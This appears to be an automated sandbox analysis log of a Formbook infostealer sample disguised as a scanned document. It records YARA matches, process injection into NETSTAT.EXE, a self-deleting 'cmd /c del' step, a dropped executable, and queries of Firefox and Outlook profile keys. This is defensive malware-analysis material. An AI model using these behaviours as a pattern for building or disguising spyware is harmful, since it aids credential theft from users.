          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00419830 NtCreateFile,
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_004198E0 NtReadFile,
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00419960 NtClose,
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00419A10 NtAllocateVirtualMemory,
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_0041982A NtCreateFile,
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_004198DA NtReadFile,
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_0041995B NtClose,
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_01012208
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_01010472
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_01010FC0
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_01013110
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_01011839
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_01014B80
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_01014B90
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_01010F2C
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_01012FCE
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_010151D8
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_010151E8
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_010130A9
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_010130BC
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_010153F8
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_01015408
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0101F7F0
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_010156A0
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_010156B0
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_01013F79
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_01013F88
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_09DDF798
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_09DDF78A
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0B1C4151
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0B1C30D8
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0B1C2650
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0B1C4490
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0B1C4207
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0B1C310D
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0B1C1030
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0B1C1020
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0B1C30C9
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00401030
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_0041D9C8
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00402D89
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00402D90
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_0041DEEC
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00409F5B
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00409F60
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00402FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0341FB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034263C2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03424B96
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_033FEBE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03424A5B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034B0A02
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034CE214
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0342523D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034C22DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034C1A99
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034142B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0342594B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03449906
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03427110
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034B61DF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034C19E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03426180
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034CD9BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03421070
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03429810
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034BD016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0342E020
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03420021
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034248CB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034C28E8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0340A080
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034A18B6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034C1746
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034C1FCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034B2782
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03415790
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03417640
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03424E61
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034BCE66
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03425E70
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03426611
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034C26F8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034B3E96
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034B1D1B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034C2519
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03411530
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0349C53F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_033F0D40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034AFDDB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034BD5D2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034A1DE3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0349E58A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034BE581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0342547E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0340740C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03411410
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034AF42B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034BDCC5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034B44EF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034C1C9F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034C2C9A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034B3490
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E7D9C8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E7DEEC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E62FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E69F60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E69F5B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E62D89
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E62D90
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0A05F798
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0A05F797
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0B444151
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0B4430D8
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0B442650
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0B444490
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0B444207
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0B44310D
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0B441020
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0B441030
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0B4430C9
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00401030
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_0041D9C8
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00402D89
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00402D90
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_0041DEEC
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00409F5B
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00409F60
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00402FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 03485110 appears 38 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0344DDE8 appears 43 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 033FB0E0 appears 176 times
          Source: Scan_06032020.exeBinary or memory string: OriginalFilename vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000000.00000002.555559475.00000000006C2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000000.00000002.565029549.000000000B130000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000000.00000000.528970707.0000000000652000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000000.00000002.556283565.0000000000DD0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Scan_06032020.exe
          Source: Scan_06032020.exeBinary or memory string: OriginalFilename vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000002.00000002.551467733.00000000003E2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000002.00000002.551670785.0000000000452000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
          Source: Scan_06032020.exeBinary or memory string: OriginalFilename vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000003.00000000.552652444.00000000001B2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000003.00000000.552510795.0000000000142000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe
          Source: Scan_06032020.exeBinary or memory string: OriginalFilename vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000004.00000002.606369972.0000000001C9F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000004.00000000.554340459.0000000000EA2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000004.00000002.603915424.0000000000FF0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000004.00000000.554197147.0000000000E32000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe
          Source: Scan_06032020.exeBinary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe
          Source: Scan_06032020.exeBinary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
          Source: C:\Windows\SysWOW64\NETSTAT.EXERegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
          Source: C:\Windows\explorer.exeSection loaded: comsvcs.dll
          Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: Scan_06032020.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: ufipp6ljxlz.exe.5.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/8@9/4
          Source: C:\Users\user\Desktop\Scan_06032020.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scan_06032020.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4640:120:WilError_01
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\Qor0xv4iJump to behavior
          Source: Scan_06032020.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Scan_06032020.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Scan_06032020.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Scan_06032020.exeVirustotal: Detection: 16%
          Source: Scan_06032020.exeReversingLabs: Detection: 48%
          Source: unknownProcess created: C:\Users\user\Desktop\Scan_06032020.exe 'C:\Users\user\Desktop\Scan_06032020.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Scan_06032020.exe {path}
          Source: unknownProcess created: C:\Users\user\Desktop\Scan_06032020.exe {path}
          Source: unknownProcess created: C:\Users\user\Desktop\Scan_06032020.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Scan_06032020.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe
          Source: unknownProcess created: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Users\user\Desktop\Scan_06032020.exeProcess created: C:\Users\user\Desktop\Scan_06032020.exe {path}
          Source: C:\Users\user\Desktop\Scan_06032020.exeProcess created: C:\Users\user\Desktop\Scan_06032020.exe {path}
          Source: C:\Users\user\Desktop\Scan_06032020.exeProcess created: C:\Users\user\Desktop\Scan_06032020.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Scan_06032020.exe'
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeProcess created: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe {path}
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
          Source: C:\Windows\SysWOW64\NETSTAT.EXEFile written: C:\Users\user\AppData\Roaming\N629P6-6\N62logri.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\Scan_06032020.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Scan_06032020.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Scan_06032020.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: Scan_06032020.exe, 00000004.00000002.603915424.0000000000FF0000.00000040.00000001.sdmp
